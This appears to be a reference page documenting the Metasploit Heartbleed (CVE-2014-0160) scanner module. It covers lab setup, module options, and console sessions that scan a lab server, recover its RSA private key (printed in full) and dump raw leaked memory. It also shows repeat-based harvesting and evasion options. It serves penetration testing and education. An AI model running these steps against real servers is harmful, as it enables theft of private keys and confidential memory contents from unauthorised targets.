OpenSSL Heartbeat (Heartbleed) Information Leak - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/ssl/openssl_heartbleed metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Verification Steps
- Options
- Advanced Options
- Scenarios
- SCAN against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
- KEYS against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
- DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
- Utilizing repeat
- Confirming using NMAP
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: OpenSSL Heartbeat (Heartbleed) Information Leak
Module: auxiliary/scanner/ssl/openssl_heartbleed
Source code: modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
Disclosure date: 2014-04-07
Last modification time: 2022-07-19 16:04:41 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 443
List of CVEs: CVE-2014-0160
This module is also known as Heartbleed.
This module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable. The module supports several actions, allowing for scanning, dumping of memory contents to loot, and private key recovery. The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP. The repeat command can be used to make running the SCAN or DUMP many times more powerful. As in: repeat -t 60 run; sleep 2 To run every two seconds for one minute.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > show options
... show and set options ...
msf auxiliary(openssl_heartbleed) > set RHOSTS ip-range
msf auxiliary(openssl_heartbleed) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(openssl_heartbleed) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
The heartbleed bug was extremely well documented, but essentially boils down to a client being able to specify how much memory is retrieved from the server when performing a TLS heartbeat. This results in an arbitrary memory read, where an attacker is able to read the contents of memory.
Install OpenSSL 1.0.1d on Ubuntu 18.04
The following commands will download OpenSSL 1.0.1d, build and install it.
Finally, we'll use the built in s_server
to start the service to be scanned.
install_sw
is used to prevent an install
error.
sudo apt-get install build-essential
wget https://www.openssl.org/source/old/1.0.1/openssl-1.0.1d.tar.gz
tar -zxf openssl-1.0.1d.tar.gz && cd openssl-1.0.1d
./config
sudo make
sudo make install_sw
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
/usr/local/ssl/bin/openssl s_server -key key.pem -cert cert.pem -accept 44330 -www
If you receive gethostbyname failure
error in openssl
, add the client (metasploit)
IP and hostname to your hosts file.
Verification Steps
- Install a vulnerable OpenSSL, start the service
- Start msfconsole
- Do:
use auxiliary/scanner/ssl/openssl_heartbleed
- Do:
set rhosts [ip]
- Do:
set action [ACTION]
- Do:
run
Options
Action
- SCAN: Scan the host to see if it is vulnerable. If
verbose
is set totrue
, also print the memory that was dumped. This is the default. - DUMP: Dump the memory and store it as loot.
- KEYS: Similar to DUMP but scan the results for the private key.
TLS_CALLBACK
Protocol to use if a specific underlying protocol is required. Default is None
.
TLS_VERSION
The specific version of TLS (or SSL) to use, if only specific ones are avaialble. Defaults to 1.0
(TLS1.0).
MAX_KEYTRIES
If Action is set to KEYS
, the maximum amount of times to dump memory and attempt to retrieve the private key.
Similar to LEAK_COUNT
but only applies to KEYS
. Default is 50
.
STATUS_EVERY
If Action is set to KEYS
, how often the status should be printed. Default is 5
.
DUMPFILTER
A regular expresion (used in scan function) to use to filter the dump before storing. Default is nil
.
RESPONSE_TIMEOUT
How long to wait for the server to respond in seconds. Default is 10
.
LEAK_COUNT
If Action is set to SCAN
or DUMP
, the maximum amount of times to dump memory.
Similar to MAX_KEYTRIES
. Default is 1
.
Advanced Options
HEARTBEAT_LENGTH
How much memory should attempt to be retrieved. Default is 65535
.
XMPPDOMAIN
If jabber
is selected for TLS_CALLBACK
, the domain to use. Default is localhost
.
Scenarios
SCAN against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
With the default action of SCAN
we can determine if the server is vulnerable or not.
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330
rport => 44330
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
KEYS against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
In order to help elicit the keys, we can run the following code to help populate memory with the keys:
watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem'
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 222.222.2.222:44330 - Scanning for private keys
[*] 222.222.2.222:44330 - Getting public key constants...
[*] 222.222.2.222:44330 - 2019-10-13 01:32:17 UTC - Starting.
[*] 222.222.2.222:44330 - 2019-10-13 01:32:17 UTC - Attempt 0...
[+] 222.222.2.222:44330 - 2019-10-13 01:32:18 UTC - Got the private key
[*] 222.222.2.222:44330 - -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7ax3L0LRt5uZQTFOiJkX2xRn9ww/G87gMkMBAdeEzph7a2/i
C4stnajh9NsUbACv+dt8mtwgh0Vg4lMaI5iB9lXlqfsR17vIsW+/AZXj3Eo+B0QU
l8MpVilDvm3Hee0tE9NGLMR+Vk1Eq0UL+w7Gc/IswkFtj8XGMQ3Jc6OaJ6Ofh5hF
VlmyQBrtwvZ/20g5KtMbZFv1XX28bjEd47qfTo8nrnCsrjD7h7R42GrRw9hhvWse
sEa9VyTwQF0W8mxTYFx/7evXeJNVw1drmhJrxpGfb9gl8qzQgf6PQoi1LXaPAdk5
1cshKeGXmcA+1FR5HOdvWEqzCjMxApzdExNSgwIDAQABAoIBACmdYAT7ayL98JiU
nI6YV6/5Y7bDAy3ITEMgrkV3Sf6ufjWykl65ENShJGcuEOZUPHvALZIj5uIoiK04
JcSDyIWsRpk7p8UhUSOYUFZju1DwAupcxkpIVq2Kbh0itaGooJLvFEN0aDaOMu7W
GSHtVVwp1CJzOE7LL0eZhWNlCvHTgwwobaAUYEyrDmkOdWskMC3RGu5JrrfKTK+5
VUwMMAJ7Wf+d+xeTrNHwGGdEvHd23p1B1E3+axG0XqxI7wODz14iAWgd1zp2gSq2
Ji/II0E8Okwl3AR0d8SD0cJeEPHWlrr/6LzBUTHanDBGe2SXP/SMFSvyEpoPw/s8
vovI1okCgYEA8Ju7TuE4V2UQjZi8qcNAFnbxfcS9bk8S+BBKkgKtMY6wZT8h03fP
ouYot1IaRxMVlErrUeVtD/YKD+nhNFFYZGCSChjAhvf1rq/wzRILWpdGZ3SF9UuR
NlNpH1DcVZPOdTxCJ8DfjY72m/ugYysorQdmo9L58BhMKbfp9aHOR0cCgYEA/OCs
73xWEECKS7of0B+3CKriYT7fROu5wP9gFl3/FR8q7275TG2Iwg0rDz4NLGJhcVQ8
4bNAz+OglxqXkIVOf5Cuj8DibAw2JTr+MP5wQUaB0fPdwPcNw/fBq68x/+UpdcM2
B98b2uykN3Q2Zd2g3VVrKUOb4yJlE1EEvVrt8OUCgYEAq6oQe3jIn+Hla4D7qgs6
IE0AgwDpPliAaigFbCMoumDZjYL7eUrUA58+kXysbuU40jKZrjaIF4ktKKlvGcqn
zAXya+24/xLOYLH6lfU30Ix5mLpUEOy3UBE2wTcJ3Ky18oLpmD9NwEutuyBOEDLs
tHbBTkTqOdi8Dk+/RpcI+2UCgYEAj5qDeqiwMyCDqMd0w3sPNTPdxP2wSvJWlVww
0+LjNbpyZnAt0JIvZIuX1VsWngrsbTA6Nq3V83i/vK+UPLUHQ/gEuYv+yP8STIg4
y9fiJZ+Fn5YOa0OhJJVw/S9LhJc9uSt3Znbz2ZojE37CWYzHiom0hkVnpE/m+FY9
C880amUCgYAw8b+F3iBCEzioeUWW62c89yQaV0Ci/BQgvkhLsRRZr5hlt8+NWjSv
Nx2YT7eEcEIMOzOYF0zUH/gLo7UbZXGk/GlupqWP7kumwALz5Hu3gnx5+c69A0yL
FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg==
-----END RSA PRIVATE KEY-----
[*] 222.222.2.222:44330 - Private key stored in /root/.msf4/loot/20191012213218_default_222.222.2.222_openssl.heartble_250185.txt
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes
[+] 222.222.2.222:44330 - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
���]�O���g�hE�_.[�MT��b��k�f��
�"�!98����5����
�� ��32��ED��/�A���
� �@�DA8u-� b�,��Y'L��Մ�ձ3��-�bt����`�;ˋz���4���
�`���w��Vnvv�x���'�`���Y$�H |��k E��ޞ=A�Gx�A��
a��f�D�9I��W�ϋ3/�V�s�D%����|������Z;��1FF���)�vC���ny7m��N1v/�&�Y�T@��e�3�D�ʗ�O��pc��,�y��q�G�g��z��`^�s�Mk*����Ou���E�ぜ���l]�%<,�@��S�зN� "�����"���ct{uj��Ц�*N���a\{�5vRNW��-4S�^0b�e��7���=r���J>D��)V)C�m�y�-�F,�~VMD�E
�s��'����EVY�@�����H9*�[�]}�n1㺟N�'�p��0���x�j���a�k�F�W$�@]�lS`\���x�U�Wk�kƑ�o�%�Ё��B��-v��9��!)ᗙ�>�Ty�oXJ�
31��R��S0Q0U�]�v%C��#��*�B|c
K0U#0��]�v%C��#��*�B|c
K0U�0�0 *�H��
���^��#
怅W7��G�w�n�*wFcR�~����l8�C*]��@��g+;=�|8�b߬3
1�ŏmA�,�s��l1v�d����m�i^�������y�}����5�2��'��s�M����G �U�2[������N�^p](������*\��3(ic�U��{�
E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��-�
�ok{�΄�C2��
�g���N1A����B/w��!��)�U���B/w�����)�U�#�%��\ �rV���A#��_
�m&r�]�J�
;���/_��
���rD���WMZt0���*ʟ����J�bB�U
|�ƭ���6���,s�d��7�s�8$,�I|��'�7ײ
�X��j�%����uj}��Y�a'�Ks��V��c.���vn:
B���c��q)GL�y0T�a&aZ�*q/#��������)�:յ�-����ހYi�R3�rb)��
�����5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴ;�v��]��I@��Á�K7H��
i�,�ut�~�
߃��u*n��w����.�fU��� R�X��y��^��|�0��udh����F������>��-��y�n�Š�윀�1��P�����W
��Ii�����/�|��+�l)Nv�c�3�U7��Xud@�o��z�(Lk ��0R|7���5�j^%����'L;S,"�����5 ӕv�;{q)�W�
zJX��>j�;��f��t��DQ�Ez/�Rݜ13
1�ŏmA�,�s����)!��9��v-��B���Ь�%�o���k�kW�U�x���\`Sl�]@�$W�F�k�a���j�x���0��p�'�N���1n�}]�[d*9H�����@�YVE����'��s�
E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��-�
�ok{�΄�C2��
�g���N1A����B/w��q��)�U!�Ɠ)�U���)�`0��)�U�@ɓ)�U!`��)�U!@��)�U!@��)�U���B/w��1��5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴq���)�U!��)�U��8NE<���GGΡ��)L��ңf�(+c��������'Ba���K�@V|�����Õ)�U<���!�!b��{����C�M>
[����A8�%��Aθ�����ŪY�6K ��U߆�
��XA��5j�X��q�'}��c�u���Ͷ�W���9�*5������g�3��Q �a7ڊ�a7ڊ�ĕ)�U�ĕ)�UP �W��(E ��
[&(yu0�.���I�V���t�1��fE�I̮N;��p˫�]�2�&^} �� #����Ƃ�T�|i2�&~<�Q;T�B�TAﴕ:�/��H�^W��x�����]͓!��@@c7ڊ@c7ڊPd�)�UPd�)�Ulocalhost
::1 localhost6.localdomain6 localhost6
111.111.1.111 client
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
�� <%�N�O#&���+-91��,�q��k�sNV^I�
�n
jgd0�`*�H�� ��y�M�,0
0E1
0 UAU10U
Some-State1!0U
201011031638Z0E1 Pty Ltd0
0 UAU10U
Some-State1!0U
�0�ernet*�H��its Pty Ltd0�"0
���w/Bѷ��A1N���g�
?�2CׄΘ{ko�
�-�����l���|�� �E`�S�#���U��ȱo����J>D��)V)C�m�y�-�F,�~VMD�E
�s��'����EVY�@�����H9*�[�]}�n1㺟N�'�p��0���x�j���a�k�F�W$�@]�lS`\���x�U�Wk�kƑ�o�%�Ё��B��-v��9��!)ᗙ�>�Ty�oXJ�
31��R��S0Q0U�]�v%C��#��*�B|c
K0U#0��]�v%C��#��*�B|c
K0U�0�0 *�H��
���^��#
怅W7��G�w�n�*wFcR�~����l8�C*]��@��g+;=�|8�b߬3
�Ѓ�������"�l1v�d����m�i^�������y�}����5�2�K?�!��M����G �U�2[������N�^p](������*\��3(ic�U��{�
GA8u-� b�,��Y'L��Մ�ձ3��-�bt����`�;ˋz���4���
�`���w��Vnvv�x���'�`���Y$�H |��k E��ޞ=A�Gx�A��
a��f�D�9I��W�ϋ3/�V�s�D%����|������Z;��1FF���)�vC���ny7m��N1v/�&�Y�T@��e�3�D�ʗ�O��pc��,�y��q�G�g��z��`^�s�Mk*����Ou���E�ぜ����n��=*��LX-�*N���a\{�5vRNW��-4S�^0b�e��7���=r+A`d�)�Upt�)�U@q�U���)�U0;�)�U1����������������1߽�)bߜؐ0�x���.!�� ��4H�0܊�����\�A��������������������
G�eO�IB�*�H��@q� ��y�M�,0
0E1
0 UAU10U
Some-State1!0U
201011031638Z0E1 Pty Ltd0
0 UAU10U
Some-State1!0U
�0�ernet*�H��its Pty Ltd0�"0
���w/Bѷ��A1N���g�
?�2CׄΘ{ko�
�-�����l���|�� �E`�S�#���U��ȱo����J>D��)V)C�m�y�-�F,�~VMD�E
�s��'����EVY�@�����H9*�[�]}�n1㺟N�'�p��0���x�j���a�k�F�W$�@]�lS`\���x�U�Wk�kƑ�o�%�Ё��B��-v��9��!)ᗙ�>�Ty�oXJ�
31��R��S0Q0U�]�v%C��#��*�B|c
K0U#0��]�v%C��#��*�B|c
K0U�0�0 *�H��
���^��#
怅W7��G�w�n�*wFcR�~����l8�C*]��@��g+;=�|8�b߬3
�Ѓ�������"�l1v�d����m�i^�������y�}����5�2�q�Upѓ)�U D�)�U!�]�v%C��#��*�B|c�����*\��3(ic�U��{�
K!���)�U!��)�U!�]�v%C��#��*�B|c
K!�B�)�U����'�U0ؓ)�U�8�)�U0��)�U�@��)�U 9�)�U0��)�U`��)�U���)�U���)�U���)�U
G�eO��Pϓ)�U �U0v�'�U�X�'�U�X�'�U�b�'�U�b�'�U�b�'�Up�'�U�W�'�U�a�'�q�'�U�m�'�Uxt�'�U�����Q@��)�UA�����w�ۯ�H��#
G�eO�IB�����u�)�U��)�U@!В�)�U!���)�U !p��)�U !���)�U�Ò)�U !���)�U 1�U���)�UQ ��)�UA����oI,�Щ�������\�ͭ�r��&��)�U@!1�Y�"&�
����
����A��W��GЊ`��)�U!Б�)�U�\7ڊ! ��)�U�\7ڊ��������!<�)�U�\7ڊ �Ò)�U�\7ڊ�1p��)�U!@��)�U�\7ڊ`��)�U1@��)�U0QA�Y�"&�
����
����A��W��GЊ@10��)�Uq0��)�U���)�U�Rݜ13
1�ŏmA�,�s����)!��9��v-��B���Ь�%�o���k�kW�U�x���\`Sl�]@�$W�F�k�a���j�x���0��p�'�N���1n�}]�[d*9H�����@�YVE����'��s�
E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��-�
�ok{�΄�C2��
�g���N1A����B/w�����)�U,�܁���$z�K
��
����k��졽N�"A�EV����<)�HN�m[��s��y�w��6��2]�Q���=Mx,f.|E=�,�����n�D9 h3�F�4���~n��
Zd�Z*wc�\�l��`Hԑ���0���TnzBeժ+e A�#AV�̗��
���]v��M��ɸ�=��O@��ʘEf�!�J3��Cvj������[�t.R��c�{���.�cy��ݵu&$�n�*�!����5�1Њغjx��fۢԐ`�c�����d�B�8�3�Hn7ȩ՜�ku����i2��B}o~�/n$ ��J������bqF�B�v��9IM�t'Vu����L5Z
&�'��TO (�y��
�`��~�Ie:��cdn��]"�g����}J\plA�FvKkR1:? ٭� -�@�_�B�|��B��S��f�cVES]��V�^��Bm�
�@���z���?_@D~o�]�
1
V��WS��\���J�%�!݈��҅]�%�q���)�U1����������������08R6k��C����l�2�!S��|�G�j��G���>�w8q�_C��9�
{=o�n�� ��3�E�b1p|�%�h���<�a:bhj��-�6Z���2�w��!pB�)�U@��)�U!�f{��?�Py0��\�����,�s/��ޫ���5�ơ�{*�{�N#W�"��,�VW���a�#��a9�k?b��9濞~���e�^�MQ�� ��n��w�x�Z%1�ŏmA�,�s��'��s�
E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��-�
�ok{�΄�C2��
�g���N1A����B/w��!�)�U���)�U�#�%��\ �rV���A#��_
�m&r�]�J�
;���/_��
���rD���WMZt0���*ʟ����J�bB�U
|�ƭ���6���,s�d��7�s�8$,�I|��'�7ײ
�X��j�%����uj}��Y�a'�Ks��V��c.���vn:
B���c��q)GL�y0T�a&aZ�*q/#��������)�:յ�-����ހYi�R3�rb)��
�����5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴ�� �:v���)6��jInld��P�-1��ɾ�
��DyE�����l�"��e�#��Ǽ���-J���o�Ȼ����U���#�S�`E� ܚ|���l��-�
�ok{�΄�C2��
�g���N1A����B/w��q��)�U!�Ɠ)�U���)�``��)�U�@ɓ)�U!��)�U���B/w��!@��)�U!@��)�U���B/w��1��5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴq���)�U!��)�U��8NE<���GGΡ��)L��ңf�(+c��������'Ba���K�@V|����q�'�UHn�'�U�v�'�U0v�'�U�X�'�U�X�'�U�b�'�U�b�'�U�b�'�Up�'�U�W�'�U�a�'�q�'�U�m�'�Uxt�'�U t�'�UxS�'�UpR�'�UPo�'�U�k�'�UXO�'�U`q�'�U�m�'�U�u�'�U(u�'�U�V�'�U�V�'�U`f�'�f�'�U]�'�U�\�'�U�o�'�U8l�'�U�U�'�Ue�'�U�[�'�U�p�'�U@m�'�U�n�'�U�k�'�U�M�'�UHM�'�U S�'�UR�'�UO�'�U�R�'�U�Q�'�U�N�'�U�M�'�U�L�'�UA���)�UA�@a7ڊ@a7ڊ@Ǖ)�U@Ǖ)�U��W��(E ��
[&(yu0�.���I�V���t�1��fE�I̮N;��p˫�]�2�&^} �� #����Ƃ�T�|i2�&~<�Q;T�B�TAﴕ:�/��H�^W��x�����]͓!���]�O��bC��Z�A�gw��it��Zy
The contents of /etc/hosts
is visible in this file, as it was edited to prevent the gethostbyname failure
issue previously noted.
Utilizing repeat
Because arbitrary memory is dumped, a high volume application that uses openSSL will cycle potentially valuable data
fairly often. The repeat
command can be used to execute the module multiple times.
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Confirming using NMAP
Utilizing the ssl-heartbleed script, we can replicate
the SCAN
action.
# nmap -p 44330 --script ssl-heartbleed 222.222.2.222
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 17:52 EDT
Nmap scan report for ubuntu1804.romain (222.222.2.222)
Host is up (0.0017s latency).
PORT STATE SERVICE
44330/tcp open unknown
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
MAC Address: 00:0C:29:AA:AA:AA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
Go back to menu.
Msfconsole Usage
Here is how the scanner/ssl/openssl_heartbleed auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show info
Name: OpenSSL Heartbeat (Heartbleed) Information Leak
Module: auxiliary/scanner/ssl/openssl_heartbleed
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-04-07
Provided by:
Neel Mehta
Riku
Antti
Matti
Jared Stafford <[email protected]>
FiloSottile
Christian Mehlmauer <[email protected]>
wvu <[email protected]>
juan vazquez <[email protected]>
Sebastiano Di Paola
Tom Sellers
jjarmoc
Ben Buchanan
herself
Available actions:
Name Description
---- -----------
DUMP Dump memory contents to loot
KEYS Recover private keys from memory
SCAN Check hosts for vulnerability
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Description:
This module implements the OpenSSL Heartbleed attack. The problem
exists in the handling of heartbeat requests, where a fake length
can be used to leak memory data in the response. Services that
support STARTTLS may also be vulnerable. The module supports several
actions, allowing for scanning, dumping of memory contents to loot,
and private key recovery. The LEAK_COUNT option can be used to
specify leaks per SCAN or DUMP. The repeat command can be used to
make running the SCAN or DUMP many times more powerful. As in:
repeat -t 60 run; sleep 2 To run every two seconds for one minute.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-0160
https://www.kb.cert.org/vuls/id/720951
https://www.us-cert.gov/ncas/alerts/TA14-098A
http://heartbleed.com/
https://github.com/FiloSottile/Heartbleed
https://gist.github.com/takeshixx/10107280
http://filippo.io/Heartbleed/
Also known as:
Heartbleed
Module Options
This is a complete list of options available in the scanner/ssl/openssl_heartbleed auxiliary module:
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
---- -----------
SCAN Check hosts for vulnerability
Advanced Options
Here is a complete list of advanced options supported by the scanner/ssl/openssl_heartbleed auxiliary module:
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show advanced
Module advanced options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
HEARTBEAT_LENGTH 65535 yes Heartbeat length
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
XMPPDOMAIN localhost yes The XMPP Domain to use when Jabber is selected
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/ssl/openssl_heartbleed module can do:
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions
Auxiliary actions:
Name Description
---- -----------
DUMP Dump memory contents to loot
KEYS Recover private keys from memory
SCAN Check hosts for vulnerability
Evasion Options
Here is the full list of possible evasion options supported by the scanner/ssl/openssl_heartbleed auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- HEARTBEAT_LENGTH should be a natural number less than 65536
- RESPONSE_TIMEOUT should be bigger than 0
- Unknown Action: <ACTION.NAME>
- "]urn:ietf:params:xml:ns:xmpp-tls[
- Jabber host unknown. Please try changing the XMPPDOMAIN option.
- FTP error: <RES.STRIP>
- STARTTLS failed...
- Server Hello Not Found
- No Heartbeat response...
- Protocol error. Looks like the chosen protocol is not supported.
- Unknown error
- Unexpected Heartbeat response header (<TO_HEX_STRING-HDR>)
- Looks like there isn't leaked information...
- Failed to get public key, aborting.
- Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.
- No certificate found
- No SSL record header received after <RESPONSE_TIMEOUT> seconds...
- No SSL record contents received after <RESPONSE_TIMEOUT> seconds...
- Type: Handshake type <HS_TYPE> not implemented
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
HEARTBEAT_LENGTH should be a natural number less than 65536
Here is a relevant code snippet related to the "HEARTBEAT_LENGTH should be a natural number less than 65536" error message:
195: end
196:
197: # Main method
198: def run
199: if heartbeat_length > 65535 || heartbeat_length < 0
200: print_error('HEARTBEAT_LENGTH should be a natural number less than 65536')
201: return
202: end
203:
